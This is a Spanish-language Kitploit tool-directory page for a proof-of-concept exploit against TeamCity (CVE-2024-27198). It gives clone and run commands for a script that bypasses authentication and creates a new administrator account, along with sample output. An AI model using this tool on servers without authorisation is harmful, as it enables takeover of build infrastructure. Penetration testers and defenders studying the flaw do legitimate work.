Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-27198 — es una herramienta PoC que ataca una vulnerabilidad en el servidor TeamCity (CVE-2024-27198) | Kitploit
Herramientas/GitHubGitHub/geniuszly/cve-2024-27198
Autenticación y AutorizaciónAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubgeniuszly/cve-2024-27198

CVE-2024-27198

es una herramienta PoC que ataca una vulnerabilidad en el servidor TeamCity (CVE-2024-27198)

Ver Repositorio
3hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

ES

GenTeamCityExploit es una herramienta PoC dirigida a una vulnerabilidad en el servidor TeamCity (CVE-2024-27198). Permite descubrir una versión de TeamCity y crear un nuevo usuario administrador explotando una falla de omisión de autenticación.

Características

  • Extrae la versión del servidor TeamCity.
  • Comprueba la presencia de una vulnerabilidad conocida (CVE-2024-27198).
  • Crea un nuevo usuario administrador si el servidor es vulnerable.

Requisitos previos

  • Python 3.6+: Asegúrate de tener Python instalado.
  • Bibliotecas: Instala las bibliotecas necesarias usando:
    root@kitploit:~
    pip install requests urllib3
    

Uso

  1. Clona el repositorio.
    root@kitploit:~
    git clone https://github.com/geniuszly/CVE-2024-27198
    
  2. Navega al directorio.
    root@kitploit:~
    cd CVE-2024-27198
    
  3. Ejecuta el script con los parámetros requeridos.
    root@kitploit:~
    python3 GenTeamCityAdminCreator.py -t <target_url> -u <username> -p <password>
    
    Parámetros:
    • -t, --target: La URL del servidor TeamCity objetivo.
    • -u, --username: El nombre de usuario para el nuevo usuario administrador.
    • -p, --password: La contraseña para el nuevo usuario administrador.

Ejemplo

root@kitploit:~
python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123

Ejemplo de salida

root@kitploit:~
$ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123

[+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
[+] Сервер уязвим! Возвращен HTTP код: 200
[+] Пользователь 'newadmin' создан успешно! Перейдите на http://target-teamcity.com/login.html для входа.

En caso de que el servidor no sea vulnerable o no se encuentre la versión:

root@kitploit:~
$ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123

[+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
[-] Сервер, вероятно, неуязвим. Возвращен HTTP код: 403

Si hay un error al conectarse al servidor:

root@kitploit:~
$ python3 GenTeamCityAdminCreator.py -t http://nonexistent-url.com -u newadmin -p securepassword123

[-] Ошибка при попытке соединения с сервером: HTTPConnectionPool(host='nonexistent-url.com', port=80): Max retries exceeded with url: /login.html (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7ff9e1f07df0>: Failed to establish a new connection: [Errno -2] Name or service not known'))

Descargo de responsabilidad

Esta herramienta está destinada únicamente a fines educativos y no debe utilizarse en ningún sistema sin permiso explícito del propietario. El acceso no autorizado a sistemas informáticos es ilegal.

Descargar herramienta